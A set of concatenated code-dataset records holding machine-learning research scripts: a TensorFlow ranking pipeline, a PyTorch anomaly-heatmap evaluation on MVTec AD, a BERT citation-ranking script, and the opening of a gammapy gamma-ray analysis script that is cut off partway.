num_parallel_calls=tf.data.AUTOTUNE)\n .map(calc_label_distribution, num_parallel_calls=tf.data.AUTOTUNE))\n\n if hasattr(self, \"normalize_num_features\"):\n # add the normalization callback if it exists\n ds = ds.map(self.normalize_num_features,\n num_parallel_calls=tf.data.AUTOTUNE)\n\n return ds.prefetch(tf.data.AUTOTUNE)\n\n def _training_dataset_w_additional_negatives(self):\n # sample random negatives\n ds_negs = (tf.data.Dataset.list_files(\"click/train/*.tfrecord\", shuffle=True)\n .interleave(tf.data.TFRecordDataset, num_parallel_calls=tf.data.AUTOTUNE)\n .shuffle(1_000_000)\n .map(self.example_parser, num_parallel_calls=tf.data.AUTOTUNE)\n .batch(self.pipeline_config.random_negatives))\n\n ds = (tf.data.Dataset.list_files(\"training_data/train/*.tfrecord\", shuffle=True)\n .interleave(tf.data.TFRecordDataset, num_parallel_calls=tf.data.AUTOTUNE)\n .shuffle(100_000)\n .batch(self.pipeline_config.batch_size)\n .map(self.sequence_parser, num_parallel_calls=tf.data.AUTOTUNE))\n\n if self.pipeline_config.num_negatives != -1:\n # if we sample a positive along with several negatives, we need to make sure \n # that there are actually positive and negative examples in the sequence\n ds = (ds.unbatch()\n .filter(has_positives_and_negatives)\n .batch(self.pipeline_config.batch_size))\n\n ds_zip = (tf.data.Dataset.zip((ds, ds_negs))\n .map(concat_from_zipped_datasets, num_parallel_calls=tf.data.AUTOTUNE)\n #.map(string_to_number, num_parallel_calls=tf.data.AUTOTUNE)\n .map(self.sampler, num_parallel_calls=tf.data.AUTOTUNE)\n .map(self.tokenizer_callback, num_parallel_calls=tf.data.AUTOTUNE)\n .map(self.sample_weighter, num_parallel_calls=tf.data.AUTOTUNE)\n .map(self.feature_transformer, num_parallel_calls=tf.data.AUTOTUNE)\n .map(self.feature_merger, num_parallel_calls=tf.data.AUTOTUNE)\n .map(self.layout_encoder, num_parallel_calls=tf.data.AUTOTUNE)\n .map(calc_label_distribution, num_parallel_calls=tf.data.AUTOTUNE))\n\n if hasattr(self, \"normalize_num_features\"):\n # add the normalization callback if it exists\n ds_zip = ds_zip.map(self.normalize_num_features,\n num_parallel_calls=tf.data.AUTOTUNE)\n\n return ds_zip.prefetch(tf.data.AUTOTUNE)\n\n\n def start(self, estimator, callbacks:list=None, train_steps=None, validation_steps=None):\n\n save_ranker = SaveCallback(estimator.ranker.name,\n model_attribute=\"ranker\",\n model_name=estimator.ranker.name,\n s3_path=self.model_url,\n verbose=1,\n save_best_only=True,\n monitor=self.pipeline_config.val_metric_to_monitor,\n mode=self.pipeline_config.mode)\n\n save_bias_model = SaveCallback(estimator.propensity_estimator.name,\n model_attribute=\"propensity_estimator\",\n model_name=estimator.propensity_estimator.name,\n s3_path=self.model_url,\n verbose=0,\n save_best_only=True,\n monitor=self.pipeline_config.val_metric_to_monitor,\n mode=self.pipeline_config.mode)\n \n\n if not callbacks:\n callbacks = [save_ranker, save_bias_model]\n else:\n callbacks.append(save_ranker)\n callbacks.append(save_bias_model)\n\n train_ds = self.training_dataset()\n if train_steps:\n train_ds = train_ds.take(train_steps)\n val_ds = self.validation_dataset()\n if validation_steps:\n val_ds = val_ds.take(validation_steps).cache()\n\n return estimator.fit(train_ds, validation_data=val_ds, epochs=self.pipeline_config.epochs, callbacks=callbacks)\n\n\n def top5k_dataset(self):\n eval_espec = espec.copy()\n eval_espec = {k:v for k,v in eval_espec.items() if k in config.RANKER_FEATURES + [config.OFFER_OR_PRODUCT_COL]}\n eval_cspec = cspec.copy()\n eval_cspec[\"searchterm_normalized\"] = eval_cspec.get(\"searchterm\")\n eval_parser = SeqExampleParser(eval_espec, eval_cspec)\n\n ds_top5k = (tf.data.Dataset.list_files(\"top5k/*.tfrecord\")\n .interleave(tf.data.TFRecordDataset, num_parallel_calls=tf.data.AUTOTUNE)\n .map(eval_parser, num_parallel_calls=tf.data.AUTOTUNE)\n .batch(1)\n #.map(string_to_number, num_parallel_calls=tf.data.AUTOTUNE)\n .map(self.tokenizer_callback, num_parallel_calls=tf.data.AUTOTUNE)\n .map(self.feature_transformer, num_parallel_calls=tf.data.AUTOTUNE)\n .map(self.feature_merger, num_parallel_calls=tf.data.AUTOTUNE))\n\n if hasattr(self, \"normalize_num_features\"):\n ds_top5k = ds_top5k.map(self.normalize_num_features, num_parallel_calls=tf.data.AUTOTUNE)\n\n return ds_top5k\n\n def get_5k_rankings(self, ranker, weights=None):\n\n ds_top5k = self.top5k_dataset()\n\n block_list = get_blocklist(config.BLOCKLIST_PATH)\n queries_with_distorting_retrievals = [\"pc set komplett\", \"pc set komplett com\", \"komplett pc set\"]\n\n dfs = []\n for x in tqdm(iter(ds_top5k)):\n\n query_normalized = x[config.NORMALIZED_QUERY_COL][0].numpy().decode(\"utf-8\")\n \n if query_normalized in block_list:\n continue\n \n query = prepare_tokens_for_print(x[config.QUERY_COL], self.tokenizer)[0]\n \n if query in queries_with_distorting_retrievals:\n continue\n\n if hasattr(ranker, \"input_signature\"):\n inputs = {k: v for k,v in x.items() if k in ranker.input_signature.keys()}\n else:\n inputs = x \n\n pred = ranker.predict(inputs, verbose=0)\n\n if isinstance(pred, list):\n if not weights:\n weights = [1] * len(pred)\n pred = tf.add_n([weights[i] * pred[i] for i in range(len(pred))])\n\n pred = pred[0]\n docs = prepare_tokens_for_print(x[config.PRODUCT_TITLE_COL][0], self.tokenizer)\n pids = x[config.OFFER_OR_PRODUCT_COL][0]\n pids = [p.decode(\"utf-8\") for p in pids.numpy()]\n\n df = pd.DataFrame({\n \"query\": query_normalized,\n \"offer_or_product_id\": pids,\n \"title\": docs,\n \"score\": pred\n })\n\n dfs.append(df)\n \n merged_df = pd.concat(dfs, ignore_index=True)\n\n df_agg = merged_df.groupby([\"query\", \"offer_or_product_id\"]).agg({\"score\": np.max, \"title\":lambda x: x.iloc[0]})\n df_sorted = df_agg.sort_values([\"query\", \"score\"], ascending=False)\n final_df = df_sorted.reset_index()\n if weights is not None:\n final_df.to_csv(f\"5k_{ranker.name}_{'_'.join([str(x) for x in weights])}_weights.csv\")\n else:\n final_df.to_csv(f\"5k_{ranker.name}.csv\")\n\n return merged_df\n","repo_name":"LTluttmann/unbiased_neural_ranking","sub_path":"mt/run/pipeline.py","file_name":"pipeline.py","file_ext":"py","file_size_in_byte":22566,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"13105531273","text":"import os\nimport numpy\nimport matplotlib.pyplot as plt\nfrom sklearn.metrics import auc\nfrom sklearn import metrics\nfrom pytorch_msssim_residual_map import ms_ssim, ssim\n\nfrom ssim_module import *\nfrom ssim_module_256 import twoin1Generator as twoin1Generator256\n\nfrom mvtec_data_loader import MvtecDataLoader, DualDataLoader\nimport torch\nimport torchvision\n# import Helper\n\ntorch.cuda.empty_cache()\ncuda_dev = \"cuda:1\"\ndevice = torch.device(cuda_dev)\nprint(\">> Device Info: {} is in use\".format(torch.cuda.get_device_name(0)))\n\nsaver_count = 0\n\nBATCH_SIZE = 1\n############################ Parameters ############################\nlatent_dimension = 128\ncriterion = torch.nn.MSELoss()\nl1_criterion = torch.nn.L1Loss()\n\ndef rgb2gray(rgb):\n return numpy.dot(rgb[..., :3], [0.2989, 0.5870, 0.1140])\n\nclass Upsample(nn.Module):\n def __init__(self, scale_factor):\n super(Upsample, self).__init__()\n self.scale_factor = scale_factor\n def forward(self, x):\n return F.interpolate(x, scale_factor=self.scale_factor)\n\ndef heat_map_printer(ms_ssim_l1, img_whole, mask, threshold=None, plot=False):\n t1 = ms_ssim_l1.reshape(1, 225, 3 * 32 * 32)\n t2 = t1.permute(0, 2, 1)\n img_assem = torch.nn.functional.fold(t2, 256, 32, stride=16)\n np_grid_image = img_assem.squeeze(0).cpu().detach().numpy()\n heat_img = numpy.transpose(np_grid_image, (1, 2, 0)).squeeze().astype(numpy.float32)\n heatmap = rgb2gray(heat_img)\n\n if plot:\n grid_image = torchvision.utils.make_grid(img_whole, normalize=True, nrow=1, padding=0)\n np_grid_image = grid_image.cpu().detach().numpy()\n org_img = numpy.transpose(np_grid_image, (1, 2, 0)).squeeze().astype(numpy.float32)\n plt.imshow(org_img)\n # plt.colorbar()\n plt.axis('off')\n plt.savefig(\"../HEATMAP/org.png\")\n\n grid_image = torchvision.utils.make_grid(mask, normalize=True, nrow=1, padding=0)\n np_grid_image = grid_image.cpu().detach().numpy()\n heat_img = numpy.transpose(np_grid_image, (1, 2, 0)).squeeze().astype(numpy.float32)\n plt.imshow(heat_img)\n plt.axis('off')\n plt.savefig(\"../HEATMAP/mask.png\")\n\n return heatmap\n\n\n\n\n\ncategory = {\n 1: \"bottle\",\n 2: \"hazelnut\",\n 3: \"capsule\",\n 4: \"metal_nut\",\n 5: \"leather\",\n 6: \"pill\",\n 7: \"wood\",\n 8: \"carpet\",\n 9: \"tile\",\n 10: \"grid\",\n 11: \"cable\",\n 12: \"transistor\",\n 13: \"toothbrush\",\n 14: \"screw\",\n 15: \"zipper\"\n }\n\n\n# ####################################################################\n\ndef load_train(train_path):\n transform = torchvision.transforms.Compose([\n torchvision.transforms.Resize(256),\n # torchvision.transforms.Grayscale(num_output_channels=3),\n torchvision.transforms.ToTensor(),\n torchvision.transforms.Normalize(mean=[0.485, 0.456, 0.406], std=[0.229, 0.224, 0.225])\n ])\n imagenet_data = MvtecDataLoader(train_path, transform=transform)\n # imagenet_data = torchvision.datasets.ImageFolder(test_path, transform=transform)\n\n train_data_loader = torch.utils.data.DataLoader(imagenet_data,\n batch_size=BATCH_SIZE,\n num_workers=6,\n pin_memory=True)\n return train_data_loader\n\n\ndef load_test(test_path):\n transform = torchvision.transforms.Compose([\n torchvision.transforms.Resize(256),\n # torchvision.transforms.Grayscale(num_output_channels=3),\n torchvision.transforms.ToTensor(),\n torchvision.transforms.Normalize(mean=[0.485, 0.456, 0.406], std=[0.229, 0.224, 0.225])\n ])\n imagenet_data = MvtecDataLoader(test_path, transform=transform)\n # imagenet_data = torchvision.datasets.ImageFolder(test_path, transform=transform)\n\n test_data_loader = torch.utils.data.DataLoader(imagenet_data,\n batch_size=BATCH_SIZE,\n num_workers=6,\n pin_memory=True)\n return test_data_loader\n\n\ndef load_test_and_mask(test_path, mask_path):\n test_transform = torchvision.transforms.Compose([\n torchvision.transforms.Resize(256),\n # torchvision.transforms.Grayscale(num_output_channels=3),\n torchvision.transforms.ToTensor(),\n torchvision.transforms.Normalize(mean=[0.485, 0.456, 0.406], std=[0.229, 0.224, 0.225])\n ])\n mask_transform = torchvision.transforms.Compose([\n torchvision.transforms.Resize(256),\n torchvision.transforms.ToTensor(),\n ])\n imagenet_data = DualDataLoader(test_path, mask_path, test_transform, mask_transform)\n # imagenet_data = torchvision.datasets.ImageFolder(test_path, transform=transform)\n\n test_mask_data_loader = torch.utils.data.DataLoader(imagenet_data,\n batch_size=BATCH_SIZE,\n num_workers=0,\n pin_memory=True)\n return test_mask_data_loader\n\n\ndef load_vaild(vaild_path):\n transform = torchvision.transforms.Compose([\n torchvision.transforms.Resize(256),\n # torchvision.transforms.Grayscale(num_output_channels=3),\n torchvision.transforms.ToTensor(),\n torchvision.transforms.Normalize(mean=[0.485, 0.456, 0.406], std=[0.229, 0.224, 0.225])\n ])\n imagenet_data = MvtecDataLoader(vaild_path, transform=transform)\n # imagenet_data = torchvision.datasets.ImageFolder(test_path, transform=transform)\n\n vaild_data_loader = torch.utils.data.DataLoader(imagenet_data,\n batch_size=BATCH_SIZE,\n num_workers=0,\n pin_memory=True)\n return vaild_data_loader\n\n\n\n\nAUC_ALL = []\n# require_auc_plot = True\n# if require_auc_plot:\n# # auc_plt = plt.figure()\n# # plt.title('MS-SSIM Baseline')#.format(mem_size, mem_lamb, NORMAL_NUM_LIST))\n# plt.plot([0, 1], [0, 1], linestyle='--')\n# plt.xlim([-0.005, 1.005])\n# plt.ylim([-0.005, 1.005])\n# plt.xlabel('FPR')\n# plt.ylabel('TPR')\n\nall_group = None\n\n\ndef extract_patch(data_tmp):\n data_tmp = data_tmp.permute(0, 2, 3, 1, 4, 5)\n tmp = data_tmp.reshape(-1, 3, 32, 32)\n return tmp\n\n\ndef patch_score(img, generator32):\n latent_z_32 = generator32.encoder(img)\n generate_result32 = generator32(img)\n weight = 0.85\n ms_ssim_batch_wise = 1 - ms_ssim(img, generate_result32, data_range=data_range,\n size_average=True, win_size=3,\n weights=[0.0516, 0.3295, 0.3463, 0.2726])\n l1_batch_wise = l1_criterion(img, generate_result32) / data_range\n ms_ssim_l1 = weight * ms_ssim_batch_wise + (1 - weight) * l1_batch_wise\n\n diff = (latent_z_32 - generator32.c) ** 2\n dist = -1 * torch.sum(diff, dim=1) / generator32.sigma\n guass_svdd_loss = torch.mean(1 - torch.exp(dist))\n score_recon32 = float(ms_ssim_l1.cpu().detach().numpy())\n score_gsvdd32 = float(guass_svdd_loss.cpu().detach().numpy())\n anormaly_score32 = 0.9 * score_recon32 + 0.1 * score_gsvdd32\n return anormaly_score32\n\n\ndata_range = 2.1179 + 2.6400\noverall_iou = []\nfor key in category:\n NORMAL_NUM = category[key]\n print('Current Item: {}'.format(NORMAL_NUM))\n\n train_root = '/home/user/Documents/Public_Dataset/MVTec_AD/{}/train/'.format(NORMAL_NUM)\n test_root = '/home/user/Documents/Public_Dataset/MVTec_AD/{}/test/'.format(NORMAL_NUM)\n gt_root = '/home/user/Documents/Public_Dataset/MVTec_AD/{}/ground_truth/'.format(NORMAL_NUM)\n\n generator32 = twoin1Generator(64, latent_dimension=latent_dimension)\n\n from ssl_pretrain.resnet_cifar import *\n from ssl_pretrain.models import ContrastiveModel\n\n model = ContrastiveModel(resnet18(), mlp_number=2, cls_head_number=1)\n generator32.pretrain = model.backbone\n\n ckpt = torch.load('./check_points/p32/{}_32/No.{}_g.pth'.format(NORMAL_NUM, NORMAL_NUM), map_location=cuda_dev)\n generator32.load_state_dict(ckpt['model'])\n generator32.c = ckpt['c']\n generator32.sigma = ckpt['sigma']\n\n import sys\n sys.path.insert(0, '/media/user/T7 Touch/CVPR/')\n generator256 = torch.load('./check_points/p256/{}_256/No.{}_g.pth'.format(NORMAL_NUM, NORMAL_NUM), map_location=cuda_dev)\n\n # ent_criterion = NegEntropyLoss()\n\n generator32.to(device)\n generator256.to(device)\n\n generator32.eval()\n generator256.eval()\n\n y = []\n y_pred = []\n score = []\n score_recon = []\n score_gsvdd = []\n normal_mse_loss = []\n abnormal_mse_loss = []\n # train_root = '/home/user/Desktop/Deep Learning/public_data/MVTec_AD (with_vaild)/{}/train/'.format(NORMAL_NUM)\n # test_root = '/home/user/Desktop/Deep Learning/public_data/MVTec_AD (with_vaild)/{}/test/'.format(NORMAL_NUM)\n\n list_test = os.listdir(test_root)\n\n p_stride = 16\n with torch.no_grad():\n iou_list = []\n for i in range(len(list_test)):\n if list_test[i] == \"good\":\n continue\n current_defect = list_test[i]\n test_path = test_root + \"{}\".format(current_defect)\n mask_path = gt_root + \"{}\".format(current_defect)\n # valid_dataset_loader = load_test(test_path)\n test_mask_data_loader = load_test_and_mask(test_path, mask_path)\n height = 256\n width = 256\n # occ_size = 32\n # occ_stride = 16\n\n threshold = None\n ad_score_train = []\n\n for index, (images, img_label, mask, mask_label) in enumerate(test_mask_data_loader):\n # img = images.to(device)\n img_whole = images.to(device)\n img_tmp = img_whole.unfold(2, 32, p_stride).unfold(3, 32, p_stride)\n # img_tmp = img_whole.unfold(2, 32, 16).unfold(3, 32, 16)\n img = extract_patch(img_tmp)\n # heatmap = torch.zeros((1, 1, 256, 256))\n ############################################################################################\n # 32\n ############################################################################################\n # for index in range(img.shape[0]):\n latent_z_32 = generator32.encoder(img)\n generate_result32 = generator32(img)\n weight = 0.85\n _, residual_map = ms_ssim(img, generate_result32, data_range=data_range,\n size_average=True, win_size=3,\n weights=[0.0516, 0.3295, 0.3463, 0.2726])\n ms_ssim_batch_wise1 = 1 - F.interpolate(residual_map[0], size=32)\n ms_ssim_batch_wise2 = 1 - F.interpolate(residual_map[1], size=32)\n ms_ssim_batch_wise3 = 1 - F.interpolate(residual_map[2], size=32)\n ms_ssim_batch_wise4 = 1 - F.interpolate(residual_map[3], size=32)\n ms_ssim_batch_wise = ms_ssim_batch_wise1 * 0.0516 + \\\n ms_ssim_batch_wise2 * 0.3295 + \\\n ms_ssim_batch_wise3 * 0.3463 + \\\n ms_ssim_batch_wise4 * 0.2726\n\n l1_batch_wise = torch.abs(img - generate_result32) / data_range\n ms_ssim_l1 = F.relu_(weight * ms_ssim_batch_wise + (1 - weight) * l1_batch_wise)\n heatmap32 = heat_map_printer(ms_ssim_l1, img_whole, mask, plot=True)\n\n\n ############################################################################################\n # 256\n ############################################################################################\n latent_z_256 = generator256.encoder(img_whole)\n generate_result256 = generator256(img_whole)\n _, residual_map256 = ms_ssim(img_whole, generate_result256, data_range=data_range,\n size_average=True, win_size=11,\n weights=[0.0448, 0.2856, 0.3001, 0.2363, 0.1333])\n ms_ssim_batch_wise1 = 1 - F.interpolate(residual_map256[0], size=256)\n ms_ssim_batch_wise2 = 1 - F.interpolate(residual_map256[1], size=256)\n ms_ssim_batch_wise3 = 1 - F.interpolate(residual_map256[2], size=256)\n ms_ssim_batch_wise4 = 1 - F.interpolate(residual_map256[3], size=256)\n ms_ssim_batch_wise5 = 1 - F.interpolate(residual_map256[4], size=256)\n ms_ssim_batch_wise = ms_ssim_batch_wise1 * 0.0448 + \\\n ms_ssim_batch_wise2 * 0.2856 + \\\n ms_ssim_batch_wise3 * 0.3001 + \\\n ms_ssim_batch_wise4 * 0.2363 + \\\n ms_ssim_batch_wise5 * 0.1333\n\n l1_batch_wise = torch.abs(img_whole - generate_result256) / data_range\n heatmap256 = F.relu_(weight * ms_ssim_batch_wise + (1 - weight) * l1_batch_wise)\n heatmap256 = heatmap256.cpu().detach().numpy().squeeze(0)\n heatmap256 = numpy.transpose(heatmap256, (1, 2, 0)).squeeze().astype(numpy.float32)\n heatmap256 = rgb2gray(heatmap256)\n # heatmap256 = heat_map_printer(ms_ssim_l1, img_whole, mask, threshold=0.5)\n\n ############################################################################################\n # MULTI-SCALE\n ############################################################################################\n heatmap = 0.5 * heatmap32 + 0.5 * heatmap256\n\n SHOW_HEATMAP = heatmap.copy()\n plt.imshow(SHOW_HEATMAP, cmap=\"jet\", interpolation='none')\n plt.colorbar()\n plt.axis('off')\n plt.savefig(\"../HEATMAP/heatmap.png\")\n\n gt_mask = mask.cpu().detach().numpy().squeeze(0)\n gt_mask = numpy.transpose(gt_mask, (1, 2, 0)).squeeze().astype(numpy.int)\n\n inter_sum = heatmap + gt_mask\n inter_sum[inter_sum != 2] = 0\n inter_sum[inter_sum == 2] = 1\n intersection = numpy.sum(inter_sum)\n\n union_sum = heatmap + gt_mask\n union_sum[union_sum != 0] = 1\n union = numpy.sum(union_sum)\n # iou = intersection / union\n\n auc = metrics.roc_auc_score(gt_mask.reshape(-1), heatmap.reshape(-1))\n iou_list.append(auc)\n\n avg_iou = sum(iou_list)/len(iou_list)\n a=1\n print(\"{} AUC:{}\".format(NORMAL_NUM, avg_iou))\n overall_iou.append(avg_iou)\n a = 1\n\naverage_iou_all_class = sum(overall_iou) / len(overall_iou)\nprint(\"Overall PIXEL-LEVEL AUC: {}\".format(average_iou_all_class))\n","repo_name":"tianyu0207/IGD","sub_path":"multi_scale/inference_loc.py","file_name":"inference_loc.py","file_ext":"py","file_size_in_byte":15186,"program_lang":"python","lang":"en","doc_type":"code","stars":57,"dataset":"github-code","pt":"72"} +{"seq_id":"31503272478","text":"import json\nimport pickle\nimport sys\n\nimport torch\nimport os,sys,inspect\ncurrent_dir = os.path.dirname(os.path.abspath(inspect.getfile(inspect.currentframe())))\nparent_dir = os.path.dirname(current_dir)\nsys.path.insert(0, parent_dir)\nfrom gnlputils import extract_keys, split_data, cosine_similarity, get_from_rankings\n\nfrom pytorch_pretrained_bert import BertTokenizer, BertModel\nfrom tqdm import tqdm\n\nWORD_EMBEDDINGS_TRAIN = 'complete_bert_embeddings_train_titles.pk'\nWORD_EMBEDDINGS_EVAL = 'complete_bert_embeddings_eval_titles.pk'\n\n\ndef take_mean_bert(vector):\n return torch.mean(vector[0], dim=0)\n\n\ndef bert(abstract, tokenizer, model):\n # Tokenized input\n tokenized_text = tokenizer.tokenize(abstract)\n if len(tokenized_text) > 512:\n tokenized_text = tokenized_text[:512]\n\n # Convert token to vocabulary indices\n indexed_tokens = tokenizer.convert_tokens_to_ids(tokenized_text)\n # Convert inputs to PyTorch tensors\n tokens_tensor = torch.tensor([indexed_tokens])\n\n # If you have a GPU, put everything on cuda\n if torch.cuda.is_available():\n with torch.cuda.device(1): # NOTE: what you wanna change to set device of GPU\n tokens_tensor = tokens_tensor.cuda()\n model = model.cuda()\n\n # Predict hidden states features for each layer\n with torch.no_grad():\n encoded_layers, _ = model(tokens_tensor)\n # We have a hidden states for each of the 12 layers in model bert-base-uncased\n return encoded_layers[11]\n\n\ndef generate_word_embeddings(papers):\n lines = []\n with open(papers, 'rb') as f:\n for line in tqdm(f):\n lines.append(json.loads(line))\n\n lines.sort(key=lambda x: x['year'])\n\n ids = extract_keys(lines, 'id')\n abstracts = extract_keys(lines, 'paperAbstract')\n titles = extract_keys(lines, 'title')\n out_citations = extract_keys(lines, 'outCitations')\n\n # TODO: DO NOT HARDCODE THIS\n is_test = False\n\n train_ids, eval_ids = split_data(ids, 0.8, 0.9, is_test)\n train_abstracts, eval_abstracts = split_data(abstracts, 0.8, 0.9, is_test)\n train_titles, eval_titles = split_data(titles, 0.8, 0.9, is_test)\n train_out_citations, eval_out_citations = split_data(out_citations, 0.8, 0.9, is_test)\n\n tokenizer = BertTokenizer.from_pretrained('bert-base-uncased')\n model = BertModel.from_pretrained('bert-base-uncased')\n model.eval()\n\n eval_score = []\n matching_citation_count = 1\n min_rank = float(\"inf\")\n # TODO: changing train_abstracts -> train_titles\n for abstract in tqdm(train_titles, desc='Extracting embeddings for training set'):\n with open(WORD_EMBEDDINGS_TRAIN, 'ab') as handle:\n if abstract:\n abstract = abstract.lower()\n word_embedding = take_mean_bert(bert(abstract, tokenizer, model))\n pickle.dump(word_embedding, handle, protocol=pickle.HIGHEST_PROTOCOL)\n\n # TODO: changing eval_titles -> eval_titles\n for i, abstract in tqdm(enumerate(eval_titles[:2]), desc='Extracting embeddings for evaluation set'):\n if abstract:\n abstract = abstract.lower()\n word_embedding_eval = take_mean_bert(bert(abstract, tokenizer, model))\n with open(WORD_EMBEDDINGS_EVAL, 'ab') as f:\n pickle.dump(word_embedding_eval, f, protocol=pickle.HIGHEST_PROTOCOL)\n\n with open(WORD_EMBEDDINGS_TRAIN, 'rb') as handle:\n rankings = []\n try:\n train_index = 0\n while True:\n word_embedding_train = pickle.load(handle)\n score = cosine_similarity(word_embedding_eval.cpu(), word_embedding_train.cpu())\n rankings.append((score, train_index))\n train_index += 1\n except EOFError:\n handle.seek(0)\n rankings.sort(key=lambda x: x[0], reverse=True)\n\n out_citations = eval_out_citations[i]\n if len(out_citations):\n # gets the rankings of the training papers in the correct order\n ranking_ids = get_from_rankings(rankings, train_ids)\n true_citations = [citation for citation in ranking_ids if citation in out_citations]\n\n if len(true_citations):\n matching_citation_count += 1\n rank = ranking_ids.index(true_citations[0]) + 1\n min_rank = min(min_rank, rank)\n eval_score.append(1.0 / rank)\n\n print(\"Matching citation count = {0}\".format(str(matching_citation_count)))\n print(eval_score)\n print(\"Min rank = {0}\".format(str(min_rank)))\n print(sum(eval_score) / matching_citation_count)\n\n\ndef main():\n generate_word_embeddings(sys.argv[1])\n\n\nif __name__ == '__main__':\n main()\n","repo_name":"mitalipalekar/GatesNLP","sub_path":"src/bert/bert_embeddings.py","file_name":"bert_embeddings.py","file_ext":"py","file_size_in_byte":4866,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"72"} +{"seq_id":"42755413263","text":"import matplotlib.pyplot as plt\nimport gammapy\nimport numpy as np\nimport astropy\nimport regions\nimport sherpa\nimport uncertainties\nimport photutils\n\nimport astropy.units as u\nfrom astropy.coordinates import SkyCoord, Angle\nfrom regions import CircleSkyRegion\nfrom photutils.detection import find_peaks\nfrom gammapy.data import DataStore\nfrom gammapy.spectrum import (SpectrumExtraction,SpectrumFit,SpectrumResult,models,SpectrumEnergyGroupMaker,FluxPointEstimator)\nfrom gammapy.image import SkyImage, IACTBasicImageEstimator\nfrom gammapy.background import RingBackgroundEstimator, ReflectedRegionsBackgroundEstimator\nfrom gammapy.utils.energy import EnergyBounds\nfrom gammapy.detect import TSImageEstimator\n\nfrom gammapy.catalog import SourceCatalog2FHL\nfrom astropy.convolution import Ring2DKernel, Tophat2DKernel\nfrom astropy.visualization import simple_norm\n\nfrom gammapy.data import DataStore\nfrom gammapy.image import SkyImage, SkyImageList\nfrom gammapy.detect import KernelBackgroundEstimator as KBE\n\n######## creo log per evitare il verbose \nimport logging \nlogging.basicConfig()\nlog = logging.getLogger('gammapy.spectrum')\nlog.setLevel(logging.ERROR)\nprint(\"\\nlog created\")\n\ndef show_image(image, radius=3, vmin=0, vmax=3,name='geminga'):\n \"\"\"Little helper function to show the images for this application here.\"\"\"\n image.smooth(radius=radius).show(vmin=vmin, vmax=vmax, add_cbar=True)\n image.cutout(position=SkyCoord.from_name(name,frame='galactic'),size=(2*u.deg, 3*u.deg)).smooth(radius=radius).show(vmin=vmin, vmax=vmax, add_cbar=True)\n\n\n\nprint(\"\\n\")\nprint(\"CHECK PACKAGE VERSION ########\")\nprint('gammapy:', gammapy.__version__)\nprint('numpy:', np.__version__)\nprint('astropy:', astropy.__version__)\nprint('regions:', regions.__version__)\nprint('sherpa:', sherpa.__version__)\nprint('uncertainties:', uncertainties.__version__)\nprint('photutils:', photutils.__version__)\nprint(\"##############################\\n\")\n\n###metti all al posto di gps o cambia all in extragalactic survey\n\ndata_store = DataStore.from_dir('/Users/lucatosti/Desktop/GEMINGA/1dc/index/gps') #### oggetto generale tipo database per coordinate\n#data_store = DataStore.from_dir('$GAMMAPY_EXTRA/datasets/hess-crab4-hd-hap-prod2/')\ndata_store.info() \n\nshow_it=True\n\n# in generale selezione osservazioni---->>> funziona anche direttamente SkyCoord.from_name('crab') --->>>metti geminga\n\n# from astropy.coordinates import SkyCoord\n# table = data_store.obs_table\n# pos_obs = SkyCoord(table['GLON_PNT'], table['GLAT_PNT'], frame='galactic', unit='deg')\n# pos_target = SkyCoord(0, 0, frame='galactic', unit='deg')\n# offset = pos_target.separation(pos_obs).deg\n# mask = (1 < offset) & (offset < 2)\n# table = table[mask]\n# table.show_in_browser(jsviewer=True)\n\n\"\"\"\nobs_id = [110380, 111140, 111159]\nobs_list = data_store.obs_list(obs_id) ###modificare per creare lista completa\n ### applicare filtro -> solo osservazioni su geminga\n\n#print('##########')\nprint(obs_list)\n#print('##########')\n\nobs_cols = ['OBS_ID', 'GLON_PNT', 'GLAT_PNT', 'LIVETIME']\n#table_orig=data_store.obs_table.select_obs_id(obs_id)[obs_cols]\n\ntable = data_store.obs_table[obs_cols]\n\nobs_list2 = data_store.obs_list(table['OBS_ID'])\n#print(obs_list2)\n\npos_obs = SkyCoord(table['GLON_PNT'], table['GLAT_PNT'], frame='galactic', unit='deg')\n#target_position = SkyCoord(0, 0, unit='deg', frame='galactic')\n#pos_target = SkyCoord(0,0,unit='deg',frame='galactic')\npos_target = SkyCoord.from_name('geminga',frame='galactic')\nprint(pos_target)\noffset = pos_target.separation(pos_obs).deg\nbool1= (1 < offset) \nbool2= (offset < 1.001)\n#bool3= (table['OBS_ID']==110380 | table['OBS_ID']== 111140 | table['OBS_ID']==111159)\nmask= bool1 & bool2\ntable = table[mask]\ntable.show_in_browser(jsviewer=True)\n\n#print(table_orig)\n#print(table)\n\non_radius = 0.2 * u.deg\non_region = CircleSkyRegion(center=pos_target, radius=on_radius)\n\n\n# Define reference image centered on the target\nxref = pos_target.galactic.l.value\nyref = pos_target.galactic.b.value\nsize = 10 * u.deg\nbinsz = 0.02 # degree per pixel\nnpix = int((size / binsz).value)\n\nref_image = SkyImage.empty(\n nxpix=800, nypix=600, binsz=0.02,\n xref=xref, yref=yref,\n proj='TAN', coordsys='GAL',\n)\n\nprint(ref_image)\n\n\nexclusion_mask = ref_image.region_mask(on_region) #### creazione maschera circolare per stime bkg\nexclusion_mask.data = 1 - exclusion_mask.data\nexclusion_mask.plot()####non vuole stamparlo\n\nbkg_estimator = RingBackgroundEstimator(\n r_in=0.5 * u.deg,\n width=0.2 * u.deg,\n)\nimage_estimator = IACTBasicImageEstimator(\n reference=ref_image,\n emin=100 * u.GeV,\n emax=100 * u.TeV,\n #offset_max=3 * u.deg,\n background_estimator=bkg_estimator,\n exclusion_mask=exclusion_mask,\n)\n\n\"\"\"\n##c'è qualcosa che non va con le immagini -> scarta tutto il tutorial gammapy e prova : \n\n\"\"\"NON QUESTO PER CARITà\nimages = image_estimator.run(obs_list2)\n\n\nimages.names\nshow_image(images['counts'], radius=0, vmax=10)\nshow_image(images['counts'], vmax=5)\nshow_image(images['background'], vmax=4)\nshow_image(images['excess'], vmax=2)\n\n\"\"\"\n#110380, 111140, 111159\n\n#source_pos = SkyCoord.from_name('geminga',frame='galactic')#(83.633083, 22.0145, unit='deg')\n# If you have internet access, you could also use this to define the `source_pos`:\n#source_pos = SkyCoord.from_name('crab')\nsource_pos = SkyCoord(0, 0, unit='deg',frame='galactic')\n#source_pos = SkyCoord.from_name('crab')\nprint(source_pos)\n\nref_image = SkyImage.empty(\n nxpix=800, nypix=800, binsz=0.02,\n #xref=source_pos.ra.deg, yref=source_pos.dec.deg,\n xref=source_pos.l.deg , yref=source_pos.b.deg,\n coordsys='GAL', proj='TAN', #coordsys='CEL'\n)\nprint(\"1\")\n#events = 